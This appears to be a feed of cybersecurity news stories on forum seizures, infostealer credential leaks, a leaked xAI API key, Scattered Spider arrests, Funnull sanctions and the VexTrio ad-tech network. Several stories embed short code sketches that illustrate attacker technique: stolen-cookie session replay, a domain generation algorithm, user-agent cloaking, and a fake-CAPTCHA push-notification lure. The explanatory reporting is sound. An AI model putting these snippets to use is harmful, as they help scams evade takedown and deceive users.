My take on the takedown is that the Ukrainian authorities likely arrested Medvedovskiy. Toha shared on DaMaGeLab in 2005 that he had recently finished the 11th grade and was studying at a university — a time when Medvedovskiy would have been around 18 years old. On Dec. 11, 2006, fellow Exploit members wished Toha a happy birthday. Records exposed in a 2022 hack at the Ukrainian public services portal diia.gov.ua show that Mr. Medvedovskiy’s birthday is Dec. 11, 1987.

The law enforcement action and resulting confusion about the identity of the detained has thrown the Russian cybercrime forum scene into disarray in recent weeks, with lengthy and heated arguments about XSS’s future spooling out across the forums.

XSS relaunched on a new Tor address shortly after the authorities plastered their seizure notice on the forum’s homepage, but all of the trusted moderators from the old forum were dismissed without explanation. Existing members saw their forum account balances drop to zero, and were asked to plunk down a deposit to register at the new forum. The new XSS “admin” said they were in contact with the previous owners and that the changes were to help rebuild security and trust within the community.

However, the new admin’s assurances appear to have done little to assuage the worst fears of the forum’s erstwhile members, most of whom seem to be keeping their distance from the relaunched site for now.

Indeed, if there is one common understanding amid all of these discussions about the seizure of XSS, it is that Ukrainian and French authorities now have several years worth of private messages between XSS forum users, as well as contact rosters and other user data linked to the seized Jabber server.

“The myth of the ‘trusted person’ is shattered,” the user “GordonBellford” cautioned on Aug. 3 in an Exploit forum thread about the XSS admin arrest. “The forum is run by strangers. They got everything. Two years of Jabber server logs. Full backup and forum database.”

GordonBellford continued:

And the scariest thing is: this data array is not just an archive. It is material for analysis that has ALREADY BEEN DONE. With the help of modern tools, they see everything:

Graphs of your contacts and activity.
Relationships between nicknames, emails, password hashes and Jabber ID.
Timestamps, IP addresses and digital fingerprints.
Your unique writing style, phraseology, punctuation, consistency of grammatical errors, and even typical typos that will link your accounts on different platforms.

They are not looking for a needle in a haystack. They simply sifted the haystack through the AI sieve and got ready-made dossiers.

Customize Your Defense: Unlock Cisco XDR With Key Integrations

The new Cisco XDR Connect tool helps users to search, browse, and view the details of all available XDR integrations and automation content.

Poor Passwords Tattle on AI Hiring Bot Maker Paradox.ai

Security researchers recently revealed that the personal information of millions of people who applied for jobs at McDonald’s was exposed after they guessed the password (“123456”) for the fast food chain’s account at Paradox.ai, a company that makes artificial intelligence-based hiring chatbots used by many Fortune 500 firms. Paradox.ai said the security oversight was an isolated incident that did not affect its other customers, but recent security breaches involving its employees in Vietnam tell a more nuanced story.

A screenshot of the paradox.ai homepage showing its AI hiring chatbot “Olivia” interacting with potential hires.

Earlier this month, security researchers Ian Carroll and Sam Curry wrote about simple methods they found to access the backend of the AI chatbot platform on McHire.com, the McDonald’s website that many of its franchisees use to screen job applicants. As first reported by Wired, the researchers discovered that the weak password used by Paradox exposed 64 million records, including applicants’ names, email addresses and phone numbers.

Paradox.ai acknowledged the researchers’ findings but said the company’s other client instances were not affected, and that no sensitive information — such as Social Security numbers — was exposed.

“We are confident, based on our records, this test account was not accessed by any third party other than the security researchers,” the company wrote in a July 9 blog post. “It had not been logged into since 2019 and frankly, should have been decommissioned. We want to be very clear that while the researchers may have briefly had access to the system containing all chat interactions (NOT job applications), they only viewed and downloaded five chats in total that had candidate information within. Again, at no point was any data leaked online or made public.”

However, a review of stolen password data gathered by multiple breach-tracking services shows that at the end of June 2025, a Paradox.ai administrator in Vietnam suffered a malware compromise on their device that stole usernames and passwords for a variety of internal and third-party online services. The results were not pretty.

The password data from the Paradox.ai developer was stolen by a malware strain known as “Nexus Stealer,” a form grabber and password stealer that is sold on cybercrime forums. The information snarfed by stealers like Nexus is often recovered and indexed by data leak aggregator services like Intelligence X, which reports that the malware on the Paradox.ai developer’s device exposed hundreds of mostly poor and recycled passwords (using the same base password but slightly different characters at the end).

Those purloined credentials show the developer in question at one point used the same seven-digit password to log in to Paradox.ai accounts for a number of Fortune 500 firms listed as customers on the company’s website, including Aramark, Lockheed Martin, Lowes, and Pepsi.

Seven-character passwords, particularly those consisting entirely of numerals, are highly vulnerable to “brute-force” attacks that can try a large number of possible password combinations in quick succession. According to a much-referenced password strength guide maintained by Hive Systems, modern password-cracking systems can work out a seven-digit numeric password more or less instantly.

Image: hivesystems.com.
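To make the arithmetic concrete: a password built from seven digits has 10^7, or ten million, possible values. The back-of-the-envelope sketch below uses only Python’s standard library; the guessing rates are illustrative assumptions for a throttled online service and a fast offline hash cracker, not figures taken from the Hive Systems guide.

```python
import itertools
import string

# Keyspace for a 7-character, digits-only password.
keyspace = 10 ** 7  # 10,000,000 candidates

# Illustrative guessing rates (assumptions, not measured figures).
online_rate = 1_000            # guesses/sec against a throttled login form
offline_rate = 10_000_000_000  # guesses/sec against a stolen fast hash

print(f"online:  ~{keyspace / online_rate / 3600:.1f} hours to exhaust")
print(f"offline: ~{keyspace / offline_rate * 1000:.0f} ms to exhaust")

# Enumerating every candidate is just as trivial:
candidates = ("".join(p) for p in itertools.product(string.digits, repeat=7))
print("first few candidates:", [next(candidates) for _ in range(3)])
```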

In response to questions from KrebsOnSecurity, Paradox.ai confirmed that the password data was recently stolen by a malware infection on the personal device of a longtime Paradox developer based in Vietnam, and said the company was made aware of the compromise shortly after it happened. Paradox maintains that few of the exposed passwords were still valid, and that a majority of them were present on the employee’s personal device only because he had migrated the contents of a password manager from an old computer.

Paradox also pointed out that since 2020 it has required partners to use single sign-on (SSO) authentication that enforces multi-factor authentication. Still, a review of the exposed passwords shows they included the Vietnamese administrator’s credentials to the company’s SSO platform — paradoxai.okta.com. The password for that account ended in 202506 — possibly a reference to the month of June 2025 — and the digital cookie left behind after a successful Okta login with those credentials says it was valid until December 2025.

Also exposed were the administrator’s credentials and authentication cookies for an account at Atlassian, a platform made for software development and project management. The expiration date for that authentication token likewise was December 2025.

Infostealer infections are among the leading causes of data breaches and ransomware attacks today, and they result in the theft of stored passwords and any credentials the victim types into a browser. Most infostealer malware also will siphon authentication cookies stored on the victim’s device, and depending on how those tokens are configured thieves may be able to use them to bypass login prompts and/or multi-factor authentication.
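To see why stolen session cookies matter as much as stolen passwords, consider this minimal sketch: any HTTP client that presents a still-valid session cookie inherits the victim’s authenticated session, with no password or MFA prompt involved. The URL and cookie name below are hypothetical placeholders, not Paradox or Okta values.

```python
import requests  # pip install requests

# Hypothetical session cookie lifted from an infected device's browser profile.
stolen_cookies = {"sessionid": "PLACEHOLDER-TOKEN-VALUE"}

# The server only sees a request carrying an already-authenticated session,
# so the login form and any MFA challenge are never triggered.
resp = requests.get("https://portal.example.com/dashboard", cookies=stolen_cookies)
print(resp.status_code)
```

This is why short cookie lifetimes, device binding, and prompt session invalidation after a suspected infostealer infection are the practical defenses here.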

Quite often these infostealer infections will open a backdoor on the victim’s device that allows attackers to access the infected machine remotely. Indeed, it appears that remote access to the Paradox administrator’s compromised device was offered for sale recently.

In February 2019, Paradox.ai announced it had successfully completed audits for two fairly comprehensive security standards (ISO 27001 and SOC 2 Type II). Meanwhile, the company’s security disclosure this month says the test account with the atrocious 123456 username and password was last accessed in 2019, but was somehow missed in its annual penetration tests. So how did it manage to pass such stringent security audits with these practices in place?

Paradox.ai told KrebsOnSecurity that at the time of the 2019 audit, the company’s various contractors were not held to the same security standards the company practices internally. Paradox emphasized that this has changed, and that it has updated its security and password requirements multiple times since then.

It is unclear how the Paradox developer in Vietnam infected his computer with malware, but a closer review finds a Windows device for another Paradox.ai employee from Vietnam was compromised by similar data-stealing malware at the end of 2024 (that compromise included the victim’s GitHub credentials). In the case of both employees, the stolen credential data includes Web browser logs that indicate the victims repeatedly downloaded pirated movies and television shows, which are often bundled with malware disguised as a video codec needed to view the pirated content.

DOGE Denizen Marko Elez Leaked API Key for xAI

Marko Elez, a 25-year-old employee at Elon Musk’s Department of Government Efficiency (DOGE), has been granted access to sensitive databases at the U.S. Social Security Administration, the Treasury and Justice departments, and the Department of Homeland Security. So it should fill all Americans with a deep sense of confidence to learn that Mr. Elez over the weekend inadvertently published a private key that allowed anyone to interact directly with more than four dozen large language models (LLMs) developed by Musk’s artificial intelligence company xAI.

Image: Shutterstock, @sdx15.

On July 13, Mr. Elez committed a code script to GitHub called “agent.py” that included a private application programming interface (API) key for xAI. The inclusion of the private key was first flagged by GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.
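Scanners like GitGuardian’s work by pattern-matching new commits for strings that look like credentials and alerting the owner. The sketch below is a generic illustration of that idea, not GitGuardian’s detection logic or xAI’s actual key format: the regular expression and entropy threshold are assumptions chosen for readability.

```python
import math
import re
from collections import Counter

# Generic pattern for "something = long token-like string"; real scanners key
# on provider-specific prefixes and formats (assumed here, not xAI's actual one).
TOKEN_RE = re.compile(
    r"""(?:api[_-]?key|secret|token)["'\s:=]+([A-Za-z0-9_\-]{24,})""", re.I
)

def shannon_entropy(s: str) -> float:
    """Rough randomness measure; real keys score higher than ordinary words."""
    counts = Counter(s)
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())

def scan_file(path: str):
    """Yield (line number, candidate secret) pairs for suspicious strings."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        for lineno, line in enumerate(fh, 1):
            for match in TOKEN_RE.finditer(line):
                candidate = match.group(1)
                if shannon_entropy(candidate) > 3.5:  # heuristic cutoff
                    yield lineno, candidate

# Example usage against a checked-out repository file:
# for hit in scan_file("agent.py"):
#     print(hit)
```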

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, said the exposed API key allowed access to at least 52 different LLMs used by xAI. The most recent LLM in the list was called “grok-4-0709” and was created on July 9, 2025.

Grok, the generative AI chatbot developed by xAI and integrated into Twitter/X, relies on these and other LLMs (a query to Grok before publication shows Grok currently uses Grok-3, which was launched in February 2025). Earlier today, xAI announced that the Department of Defense will begin using Grok as part of a contract worth up to $200 million. The contract award came less than a week after Grok began spewing antisemitic rants and invoking Adolf Hitler.

Mr. Elez did not respond to a request for comment. The code repository containing the private xAI key was removed shortly after Caturegli notified Elez via email. However, Caturegli said the exposed API key still works and has not yet been revoked.

“If a developer can’t keep an API key private, it raises questions about how they’re handling far more sensitive government information behind closed doors,” Caturegli told KrebsOnSecurity.

Prior to joining DOGE, Marko Elez worked for a number of Musk’s companies. His DOGE career began at the Department of the Treasury, and a legal battle over DOGE’s access to Treasury databases showed Elez was sending unencrypted personal information in violation of the agency’s policies.

While still at Treasury, Elez resigned after The Wall Street Journal linked him to social media posts that advocated racism and eugenics. When Vice President J.D. Vance lobbied for Elez to be rehired, President Trump agreed and Musk reinstated him.

Since his re-hiring as a DOGE employee, Elez has been granted access to databases at one federal agency after another. TechCrunch reported in February 2025 that he was working at the Social Security Administration. In March, Business Insider found Elez was part of a DOGE detachment assigned to the Department of Labor.

Marko Elez, in a photo from a social media profile.

In April, The New York Times reported that Elez held positions at the U.S. Customs and Border Protection and the Immigration and Customs Enforcement (ICE) bureaus, as well as the Department of Homeland Security. The Washington Post later reported that Elez, while serving as a DOGE advisor at the Department of Justice, had gained access to the Executive Office for Immigration Review’s Courts and Appeals System (EACS).

Elez is not the first DOGE worker to publish internal API keys for xAI: In May, KrebsOnSecurity detailed how another DOGE employee leaked a private xAI key on GitHub for two months, exposing LLMs that were custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X.

Caturegli said it’s difficult to trust someone with access to confidential government systems when they can’t even manage the basics of operational security.

“One leak is a mistake,” he said. “But when the same type of sensitive key gets exposed again and again, it’s not just bad luck, it’s a sign of deeper negligence and a broken security culture.”

UK Arrests Four in ‘Scattered Spider’ Ransom Group

Authorities in the United Kingdom this week arrested four people aged 17 to 20 in connection with recent data theft and extortion attacks against the retailers Marks & Spencer and Harrods, and the British food retailer Co-op Group. The breaches have been linked to a prolific but loosely-affiliated cybercrime group dubbed “Scattered Spider,” whose other recent victims include multiple airlines.

The U.K.’s National Crime Agency (NCA) declined to verify the names of those arrested, saying only that they included two males aged 19, another aged 17, and a 20-year-old female.

Scattered Spider is the name given to an English-speaking cybercrime group known for using social engineering tactics to break into companies and steal data for ransom, often impersonating employees or contractors to deceive IT help desks into granting access. The FBI warned last month that Scattered Spider had recently shifted to targeting companies in the retail and airline sectors.

KrebsOnSecurity has learned the identities of two of the suspects. Multiple sources close to the investigation said those arrested include Owen David Flowers, a U.K. man alleged to have been involved in the cyber intrusion and ransomware attack that shut down several MGM Casino properties in September 2023. Those same sources said the woman arrested is or recently was in a relationship with Flowers.

Sources told KrebsOnSecurity that Flowers, who allegedly went by the hacker handles “bo764,” “Holy,” and “Nazi,” was the group member who anonymously gave interviews to the media in the days after the MGM hack. His real name was omitted from a September 2024 story about the group because he was not yet charged in that incident.

The bigger fish arrested this week is 19-year-old Thalha Jubair, a U.K. man whose alleged exploits under various monikers have been well-documented in stories on this site. Jubair is believed to have used the nickname “Earth2Star,” which corresponds to a founding member of the cybercrime-focused Telegram channel “Star Fraud Chat.”

In 2023, KrebsOnSecurity published an investigation into the work of three different SIM-swapping groups that phished credentials from T-Mobile employees and used that access to offer a service whereby any T-Mobile phone number could be swapped to a new device. Star Chat was by far the most active and consequential of the three SIM-swapping groups, who collectively broke into T-Mobile’s network more than 100 times in the second half of 2022.

Jubair allegedly used the handles “Earth2Star” and “Star Ace,” and was a core member of a prolific SIM-swapping group operating in 2022. Star Ace posted this image to the Star Fraud chat channel on Telegram, and it lists various prices for SIM-swaps.

Sources tell KrebsOnSecurity that Jubair also was a core member of the LAPSUS$ cybercrime group that broke into dozens of technology companies in 2022, stealing source code and other internal data from tech giants including Microsoft, Nvidia, Okta, Rockstar Games, Samsung, T-Mobile, and Uber.

In April 2022, KrebsOnSecurity published internal chat records from LAPSUS$, and those chats indicated Jubair was using the nicknames Amtrak and Asyntax. At one point in the chats, Amtrak told the LAPSUS$ group leader not to share T-Mobile’s logo in images sent to the group because he’d been previously busted for SIM-swapping and his parents would suspect he was back at it again.

As shown in those chats, the leader of LAPSUS$ eventually decided to betray Amtrak by posting his real name, phone number, and other hacker handles into a public chat room on Telegram.

In March 2022, the leader of the LAPSUS$ data extortion group exposed Thalha Jubair’s name and hacker handles in a public chat room on Telegram.

That story about the leaked LAPSUS$ chats connected Amtrak/Asyntax/Jubair to the identity “Everlynn,” the founder of a cybercriminal service that sold fraudulent “emergency data requests” targeting the major social media and email providers. In such schemes, the hackers compromise email accounts tied to police departments and government agencies, and then send unauthorized demands for subscriber data while claiming the information being requested can’t wait for a court order because it relates to an urgent matter of life and death.

The roster of the now-defunct “Infinity Recursion” hacking team, from which some members of LAPSUS$ hail.

Sources say Jubair also used the nickname “Operator,” and that until recently he was the administrator of the Doxbin, a long-running and highly toxic online community that is used to “dox” or post deeply personal information on people. In May 2024, several popular cybercrime channels on Telegram ridiculed Operator after it was revealed that he’d staged his own kidnapping in a botched plan to throw off law enforcement investigators.

In November 2024, U.S. authorities charged five men aged 20 to 25 in connection with the Scattered Spider group, which has long relied on recruiting minors to carry out its most risky activities. Indeed, many of the group’s core members were recruited from online gaming platforms like Roblox and Minecraft in their early teens, and have been perfecting their social engineering tactics for years.

“There is a clear pattern that some of the most depraved threat actors first joined cybercrime gangs at an exceptionally young age,” said Allison Nixon, chief research officer at the New York-based security firm Unit 221B. “Cybercriminals arrested at 15 or younger need serious intervention and monitoring to prevent a years-long massive escalation.”

Cisco Catalyst 8300 Excels in NetSecOPEN NGFW SD-WAN Security Tests

Cisco Catalyst 8300 earns NetSecOPEN certification for exceptional real-world NGFW and SD-WAN performance under modern enterprise conditions.

Big Tech’s Mixed Response to U.S. Treasury Sanctions

In May 2025, the U.S. government sanctioned a Chinese national for operating a cloud provider linked to the majority of virtual currency investment scam websites reported to the FBI. But a new report finds the accused continues to operate a slew of established accounts at American tech companies — including Facebook, GitHub, PayPal and Twitter/X.

On May 29, the U.S. Department of the Treasury announced economic sanctions against Funnull Technology Inc., a Philippines-based company alleged to provide infrastructure for hundreds of thousands of websites involved in virtual currency investment scams known as “pig butchering.” In January 2025, KrebsOnSecurity detailed how Funnull was designed as a content delivery network that catered to foreign cybercriminals seeking to route their traffic through U.S.-based cloud providers.

The Treasury also sanctioned Funnull’s alleged operator, a 40-year-old Chinese national named Liu “Steve” Lizhi. The government says Funnull directly facilitated financial schemes resulting in more than $200 million in financial losses by Americans, and that the company’s operations were linked to the majority of pig butchering scams reported to the FBI.

It is generally illegal for U.S. companies or individuals to transact with people sanctioned by the Treasury. However, as Mr. Lizhi’s case makes clear, just because someone is sanctioned doesn’t necessarily mean big tech companies are going to suspend their online accounts.

The government says Lizhi was born November 13, 1984, and used the nicknames “XXL4” and “Nice Lizhi.” Nevertheless, Steve Liu’s 17-year-old account on LinkedIn (in the name “Liulizhi”) had hundreds of followers (Lizhi’s LinkedIn profile helpfully confirms his birthday) until quite recently: The account was deleted this morning, just hours after KrebsOnSecurity sought comment from LinkedIn.

Mr. Lizhi’s LinkedIn account was suspended sometime in the last 24 hours, after KrebsOnSecurity sought comment from LinkedIn.

In an emailed response, a LinkedIn spokesperson said the company’s “Prohibited countries policy” states that LinkedIn “does not sell, license, support or otherwise make available its Premium accounts or other paid products and services to individuals and companies sanctioned by the U.S. government.” LinkedIn declined to say whether the profile in question was a premium or free account.

Mr. Lizhi also maintains a working PayPal account under the name Liu Lizhi and username “@nicelizhi,” another nickname listed in the Treasury sanctions. A 15-year-old Twitter/X account named “Lizhi” that links to Mr. Lizhi’s personal domain remains active, although it has few followers and hasn’t posted in years.

These accounts and many others were flagged by the security firm Silent Push, which has been tracking Funnull’s operations for the past year and calling out U.S. cloud providers like Amazon and Microsoft for failing to more quickly sever ties with the company.

Liu Lizhi’s PayPal account.

In a report released today, Silent Push found Lizhi still operates numerous Facebook accounts and groups, including a private Facebook account under the name Liu Lizhi. Another Facebook account clearly connected to Lizhi is a tourism page for Ganzhou, China called “EnjoyGanzhou” that was named in the Treasury Department sanctions.

“This guy is the technical administrator for the infrastructure that is hosting a majority of scams targeting people in the United States, and hundreds of millions have been lost based on the websites he’s been hosting,” said Zach Edwards, senior threat researcher at Silent Push. “It’s crazy that the vast majority of big tech companies haven’t done anything to cut ties with this guy.”

The FBI says it received nearly 150,000 complaints last year involving digital assets and $9.3 billion in losses — a 66 percent increase from the previous year. Investment scams were the top crypto-related crimes reported, with $5.8 billion in losses.

In a statement, a Meta spokesperson said the company continuously takes steps to meet its legal obligations, but that sanctions laws are complex and varied. They explained that sanctions are often targeted in nature and don’t always prohibit people from having a presence on its platform. Nevertheless, Meta confirmed it had removed the account, unpublished Pages, and removed Groups and events associated with the user for violating its policies.

Attempts to reach Mr. Lizhi via his primary email addresses at Hotmail and Gmail bounced as undeliverable. Likewise, his 14-year-old YouTube channel appears to have been taken down recently.

However, anyone interested in viewing or using Mr. Lizhi’s 146 computer code repositories will have no problem finding GitHub accounts for him, including one registered under the NiceLizhi and XXL4 nicknames mentioned in the Treasury sanctions.

One of multiple GitHub profiles used by Liu “Steve” Lizhi, who uses the nickname XXL4 (a moniker listed in the Treasury sanctions for Mr. Lizhi).

Mr. Lizhi also operates a GitHub page for an open source e-commerce platform called NexaMerchant, which advertises itself as a payment gateway working with numerous American financial institutions. Interestingly, this profile’s “followers” page shows several other accounts that appear to be Mr. Lizhi’s. All of the account’s followers are tagged as “suspended,” even though that suspended message does not display when one visits those individual profiles.

In response to questions, GitHub said it has a process in place to identify when users and customers are Specially Designated Nationals or other denied or blocked parties, but that it locks those accounts instead of removing them. According to its policy, GitHub takes care that users and customers aren’t impacted beyond what is required by law.

All of the follower accounts for the XXL4 GitHub account appear to be Mr. Lizhi’s, and have been suspended by GitHub, but their code is still accessible.

“This includes keeping public repositories, including those for open source projects, available and accessible to support personal communications involving developers in sanctioned regions,” the policy states. “This also means GitHub will advocate for developers in sanctioned regions to enjoy greater access to the platform and full access to the global open source community.”

Edwards said it’s great that GitHub has a process for handling sanctioned accounts, but that the process doesn’t seem to communicate risk in a transparent way, noting that the only indicator on the locked accounts is the message, “This repository has been archived by the owner. It is now read-only.”

“It’s an odd message that doesn’t communicate, ‘This is a sanctioned entity, don’t fork this code or use it in a production environment’,” Edwards said.

Mark Rasch is a former federal cybercrime prosecutor who now serves as counsel for the New York City-based security consulting firm Unit 221B. Rasch said when Treasury’s Office of Foreign Assets Control (OFAC) sanctions a person or entity, it then becomes illegal for businesses or organizations to transact with the sanctioned party.

Rasch said financial institutions have very mature systems for severing accounts tied to people who become subject to OFAC sanctions, but that tech companies may be far less proactive — particularly with free accounts.

“Banks have established ways of checking [U.S. government sanctions lists] for sanctioned entities, but tech companies don’t necessarily do a good job with that, especially for services that you can just click and sign up for,” Rasch said. “It’s potentially a risk and liability for the tech companies involved, but only to the extent OFAC is willing to enforce it.”

Liu Lizhi operates numerous Facebook accounts and groups, including this one for an entity specified in the OFAC sanctions: The “Enjoy Ganzhou” tourism page for Ganzhou, China. Image: Silent Push.

In July 2024, Funnull purchased the domain polyfill[.]io, the longtime home of a legitimate open source project that allowed websites to ensure that devices using legacy browsers could still render content in newer formats. After the Polyfill domain changed hands, at least 384,000 websites were caught in a supply-chain attack that redirected visitors to malicious sites. According to the Treasury, Funnull used the code to redirect people to scam websites and online gambling sites, some of which were linked to Chinese criminal money laundering operations.

The U.S. government says Funnull provides domain names for websites on its purchased IP addresses, using domain generation algorithms (DGAs) — programs that generate large numbers of similar but unique names for websites — and that it sells web design templates to cybercriminals.

“These services not only make it easier for cybercriminals to impersonate trusted brands when creating scam websites, but also allow them to quickly change to different domain names and IP addresses when legitimate providers attempt to take the websites down,” reads a Treasury statement.
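
For readers unfamiliar with the technique, a DGA does not need to be sophisticated: a short script that hashes a shared seed together with the current date can churn out a fresh batch of throwaway hostnames every day, and anyone who holds the same seed can reproduce the same list. The following TypeScript sketch is a purely illustrative toy, not Funnull's actual code (which has not been published); the seed value, TLD pool and output count are all invented for the example.

```typescript
import { createHash } from "node:crypto";

// Toy DGA sketch: derive a daily batch of pseudo-random domain names from a
// shared seed and the current date. Anyone holding the same seed can predict
// the same list, which is what lets an operator rotate to "new" domains
// faster than defenders can blocklist the old ones.
function generateDomains(seed: string, date: Date, count: number): string[] {
  const tlds = ["com", "top", "xyz"]; // hypothetical TLD pool
  const day = date.toISOString().slice(0, 10); // e.g. "2025-05-29"
  const domains: string[] = [];

  for (let i = 0; i < count; i++) {
    const digest = createHash("sha256")
      .update(`${seed}:${day}:${i}`)
      .digest("hex");
    const label = digest.slice(0, 12); // first 12 hex chars become the label
    const tld = tlds[parseInt(digest.slice(12, 14), 16) % tlds.length];
    domains.push(`${label}.${tld}`);
  }
  return domains;
}

// Example: print today's batch of five domains for a made-up seed.
console.log(generateDomains("example-seed", new Date(), 5));
```

Defenders sometimes work the same math in reverse, pre-computing the domains a known DGA will produce and registering or blocklisting them before they can be put to use.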

Meanwhile, Funnull appears to be morphing nearly all aspects of its business in the wake of the sanctions, Edwards said.

“Whereas before they might have used 60 DGA domains to hide and bounce their traffic, we’re seeing far more now,” he said. “They’re trying to make their infrastructure harder to track and more complicated, so for now they’re not going away but more just changing what they’re doing. And a lot more organizations should be holding their feet to the fire.”

Update, 2:48 PM ET: Added response from Meta, which confirmed it has closed the accounts and groups connected to Mr. Lizhi.

Update, July 7, 6:56 p.m. ET: In a written statement, PayPal said it continually works to combat and prevent the illicit use of its services.

“We devote significant resources globally to financial crime compliance, and we proactively refer cases to and assist law enforcement officials around the world in their efforts to identify, investigate and stop illegal activity,” the statement reads.

Building an XDR Integration With Splunk Attack Analyzer

Cisco XDR is an infinitely extensible platform for security integrations. Like the maturing SOCs of our customers, the event SOC team at Cisco Live San Diego 2025 built custom integrations to meet our needs. You can build your own integrations using the community resources announced at Cisco Live. It was an honor to work with […]

Secure Endpoint Enhancements Elevate Cisco XDR and Breach Protection Suite

Discover how Secure Endpoint enhancements elevate Cisco XDR and the Breach Protection Suite with better visibility and advanced threat defense.

Minnesota Shooting Suspect Allegedly Used Data Broker Sites to Find Targets’ Addresses

The shooter allegedly researched several “people search” sites in an attempt to target his victims, highlighting the potential dangers of widely available personal data.

XDR still means so much more than some may realize

Cisco has been named a Leader and Fast Mover in GigaOm's Radar for Extended Detection and Response (XDR). Learn what sets Cisco XDR apart in our blog.

Inside a Dark Adtech Empire Fed by Fake CAPTCHAs

Late last year, security researchers made a startling discovery: Kremlin-backed disinformation campaigns were bypassing moderation on social media platforms by leveraging the same malicious advertising technology that powers a sprawling ecosystem of online hucksters and website hackers. A new report on the fallout from that investigation finds this dark ad tech industry is far more resilient and incestuous than previously known.

Image: Infoblox.

In November 2024, researchers at the security firm Qurium published an investigation into “Doppelganger,” a disinformation network that promotes pro-Russian narratives and infiltrates Europe’s media landscape by pushing fake news through a network of cloned websites.

Doppelganger campaigns use specialized links that bounce the visitor’s browser through a long series of domains before the fake news content is served. Qurium found Doppelganger relies on a sophisticated “domain cloaking” service, a technology that allows websites to present different content to search engines compared to what regular visitors see. The use of cloaking services helps the disinformation sites remain online longer than they otherwise would, while ensuring that only the targeted audience gets to view the intended content.
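
The mechanics behind cloaking are mundane. In its simplest form, the server inspects each incoming request and decides, based on signals such as the User-Agent header, whether the visitor looks like a crawler, moderator or security scanner; suspected bots get a harmless page, while everyone else is routed to the real content. The sketch below is a minimal, hypothetical illustration of that decision logic (the hostnames and page content are placeholders), not the actual service Qurium documented, and commercial cloaking operations layer on far richer signals such as IP reputation, geolocation and device fingerprinting.

```typescript
import { createServer } from "node:http";

// Crude cloaking sketch: requests that look like crawlers or scanners get an
// innocuous page, while everything else is redirected to the "real" content.
const CRAWLER_PATTERN = /bot|crawler|spider|preview|curl/i;

const server = createServer((req, res) => {
  const userAgent = req.headers["user-agent"] ?? "";

  if (CRAWLER_PATTERN.test(userAgent)) {
    // What indexers, moderators and automated scanners are shown.
    res.writeHead(200, { "Content-Type": "text/html" });
    res.end("<html><body><h1>An ordinary cooking blog</h1></body></html>");
  } else {
    // Where targeted human visitors are sent (placeholder destination).
    res.writeHead(302, { Location: "https://example.com/targeted-content" });
    res.end();
  }
});

server.listen(8080, () => console.log("cloaking demo listening on :8080"));
```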

Qurium discovered that Doppelganger’s cloaking service also promoted online dating sites, and shared much of the same infrastructure with VexTrio, which is thought to be the oldest malicious traffic distribution system (TDS) in existence. While TDSs are commonly used by legitimate advertising networks to manage traffic from disparate sources and to track who or what is behind each click, VexTrio’s TDS largely manages web traffic from victims of phishing, malware, and social engineering scams.

BREAKING BAD

Digging deeper, Qurium noticed Doppelganger’s cloaking service used an Internet provider in Switzerland as the first entry point in a chain of domain redirections. They also noticed the same infrastructure hosted a pair of co-branded affiliate marketing services that were driving traffic to sketchy adult dating sites: LosPollos[.]com and TacoLoco[.]co.

The LosPollos ad network incorporates many elements and references from the hit series “Breaking Bad,” mirroring the fictional “Los Pollos Hermanos” restaurant chain that served as a money laundering operation for a violent methamphetamine cartel.

The LosPollos advertising network invokes characters and themes from the hit show Breaking Bad. The logo for LosPollos (upper left) is the image of Gustavo Fring, the fictional chicken restaurant chain owner in the show.

Affiliates who sign up with LosPollos are given JavaScript-heavy “smartlinks” that drive traffic into the VexTrio TDS, which in turn distributes the traffic among a variety of advertising partners, including dating services, sweepstakes offers, bait-and-switch mobile apps, financial scams and malware download sites.

LosPollos affiliates typically stitch these smartlinks into WordPress websites that have been hacked via known vulnerabilities, and those affiliates will earn a small commission each time an Internet user referred by any of their hacked sites falls for one of these lures.

The Los Pollos advertising network promoting itself on LinkedIn.

According to Qurium, TacoLoco is a traffic monetization network that uses deceptive tactics to trick Internet users into enabling “push notifications,” a cross-platform browser standard that allows websites to show pop-up messages which appear outside of the browser. For example, on Microsoft Windows systems these notifications typically show up in the bottom right corner of the screen — just above the system clock.

In the case of VexTrio and TacoLoco, the notification approval requests themselves are deceptive — disguised as “CAPTCHA” challenges designed to distinguish automated bot traffic from real visitors. For years, VexTrio and its partners have successfully tricked countless users into enabling these site notifications, which are then used to continuously pepper the victim’s device with a variety of phony virus alerts and misleading pop-up messages.

Examples of VexTrio landing pages that lead users to accept push notifications on their device.
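
Mechanically, the lure rests on the standard web Notifications API. The fake CAPTCHA widget performs no verification at all; its only job is to get the visitor to click something, and the click handler then fires the browser's genuine permission prompt. The browser-side sketch below is a simplified, hypothetical example: the element ID is invented, and real campaigns pair this with a service worker and the Push API so that messages keep arriving after the tab is closed.

```typescript
// Hypothetical fake-CAPTCHA page logic, heavily simplified. The "verify"
// button does no bot detection at all; it exists only to trigger the
// browser's native notification permission prompt.
const verifyButton = document.getElementById("captcha-verify") as HTMLButtonElement;

verifyButton.addEventListener("click", async () => {
  // Once the visitor grants permission, the site can keep pushing messages
  // (phony virus alerts, sweepstakes offers, etc.) outside the browser window.
  const permission = await Notification.requestPermission();

  if (permission === "granted") {
    new Notification("Verification complete", {
      body: "Click here to continue", // typical bait leading to follow-on pages
    });
  }
});
```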

According to a December 2024 annual report from GoDaddy, nearly 40 percent of compromised websites in 2024 redirected visitors to VexTrio via LosPollos smartlinks.

ADSPRO AND TEKNOLOGY

On November 14, 2024, Qurium published research to support its findings that LosPollos and TacoLoco were services operated by Adspro Group, a company registered in the Czech Republic and Russia, and that Adspro runs its infrastructure at the Swiss hosting providers C41 and Teknology SA.

Qurium noted the LosPollos and TacoLoco sites state that their content is copyrighted by ByteCore AG and SkyForge Digital AG, both Swiss firms that are run by the owner of Teknology SA, Giulio Vitorrio Leonardo Cerutti. Further investigation revealed LosPollos and TacoLoco were apps developed by a company called Holacode, which lists Cerutti as its CEO.

The apps marketed by Holacode include numerous VPN services, as well as one called Spamshield that claims to stop unwanted push notifications. But in January, Infoblox said it tested the app on its own mobile devices and found that Spamshield hides the user’s notifications for 24 hours, then stops hiding them and demands payment. Spamshield subsequently changed its developer name from Holacode to ApLabz, although Infoblox noted that several of the rebranded ApLabz apps still referenced Holacode in their terms of service.

